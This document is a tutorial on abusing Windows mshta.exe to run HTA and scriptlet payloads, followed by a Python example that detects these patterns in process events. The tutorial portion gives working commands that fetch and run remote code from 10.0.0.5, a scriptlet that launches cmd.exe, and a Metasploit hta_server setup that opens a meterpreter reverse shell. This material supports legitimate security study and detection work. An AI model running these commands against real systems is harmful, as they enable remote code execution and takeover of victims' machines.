HTA stands for “HTML Application”. An HTA is a downloadable file that carries all the information about how it is displayed and rendered; HTML Applications are dynamic HTML pages containing JScript and VBScript. The LOLBIN (Living-off-the-land Binary) mshta.exe is used to execute HTA files. It can be run on its own or launched automatically from Internet Explorer.
Practice
In the following example, we use an ActiveXObject in our payload as a proof of concept to execute cmd.exe. Consider the following HTML code.
We can now execute the script on the target machine
mshta.exe http://10.0.0.5/m.hta
Writing a scriptlet (.sct) file that will launch cmd.exe when invoked:
# http://10.0.0.5/m.sct
<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}">
</registration>
<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
    function Exec() {
        var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
    }
]]>
</script>
</scriptlet>
We can now execute the script on the target machine
# from powershell / cmd
mshta.exe javascript:a=(GetObject("script:http://10.0.0.5/m.sct")).Exec();close();
We can also use msfvenom (part of the Metasploit Framework) to generate HTA files.
We can now execute the script on the target machine
mshta.exe http://10.0.0.5/m.hta
We can use the Metasploit Framework to generate an HTA file and serve it directly from its built-in web server.
msf6 > use exploit/windows/misc/hta_server
msf6 exploit(windows/misc/hta_server) > set LHOST 10.8.232.37
LHOST => 10.8.232.37
msf6 exploit(windows/misc/hta_server) > set LPORT 443
LPORT => 443
msf6 exploit(windows/misc/hta_server) > set SRVHOST 10.8.232.37
SRVHOST => 10.8.232.37
msf6 exploit(windows/misc/hta_server) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/misc/hta_server) >
[*] Started reverse TCP handler on 10.8.232.37:443
[*] Using URL: http://10.8.232.37:8080/TkWV9zkd.hta
[*] Server started.
On the victim machine, once the malicious HTA file at the URL provided by Metasploit is opened, we should receive a reverse connection.
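Every variant on this page leaves the same trace in process-creation telemetry: mshta.exe launched with a remote .hta URL (the m.hta and Metasploit hta_server cases), mshta.exe launched with a javascript: protocol handler and a GetObject("script:...") moniker (the .sct case), and mshta.exe appearing as the parent of cmd.exe once the payload runs. The following is an added detection example written for this page, not code from the original write-up or from any tool it mentions. It runs a few rules over constructed Sysmon-style process events (ParentImage, Image, CommandLine); the sample records and the rule names are made up for illustration.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample events in the shape of Sysmon Event ID 1 fields.
# These are made-up records for the example, not captured telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe http://10.0.0.5/m.hta"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta.exe javascript:a=(GetObject("script:http://10.0.0.5/m.sct")).Exec();close();'},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},
    # Benign-looking local HTA: no remote source, no inline script, no child shell.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

# Interpreters that mshta.exe has no ordinary reason to spawn.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# HTA content fetched over HTTP(S)/FTP or from a UNC share rather than a local file.
REMOTE_SOURCE = re.compile(r"(https?://|ftp://|\\\\[^\\\s]+\\)", re.IGNORECASE)
# Script passed directly on the command line via a protocol handler.
INLINE_PROTOCOL = re.compile(r"\b(javascript|vbscript):", re.IGNORECASE)
# COM scriptlet moniker, which pulls a .sct file from a URL and runs it.
SCRIPT_MONIKER = re.compile(r"GetObject\s*\(\s*[\"']script:", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path, so rules compare images only."""
    return PureWindowsPath(path).name.lower()


def classify(event):
    """Return the list of rule names matched by one process-creation event."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    hits = []
    if image == "mshta.exe":
        if REMOTE_SOURCE.search(cmdline):
            hits.append("mshta_remote_source")
        if INLINE_PROTOCOL.search(cmdline):
            hits.append("mshta_inline_script")
        if SCRIPT_MONIKER.search(cmdline):
            hits.append("com_scriptlet_moniker")
    # Parent/child relationship: the payload's Run("cmd.exe") shows up here.
    if parent == "mshta.exe" and image in SHELLS:
        hits.append("mshta_spawned_shell")
    return hits


def analyze(events):
    """Return (index, matched rules) for every event that triggers at least one rule."""
    findings = []
    for index, event in enumerate(events):
        hits = classify(event)
        if hits:
            findings.append((index, hits))
    return findings


if __name__ == "__main__":
    for index, hits in analyze(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(hits)} :: {SAMPLE_EVENTS[index]['CommandLine']}")
```

The local setup.hta record is there deliberately: organisations that still ship legitimate HTAs need the remote-source, inline-script and child-shell rules rather than a blanket alert on mshta.exe, and any of those three firing on a host where mshta.exe is not expected in the first place is worth an immediate look. Where mshta.exe has no business use at all, application control that blocks it outright removes the whole class of technique shown on this page.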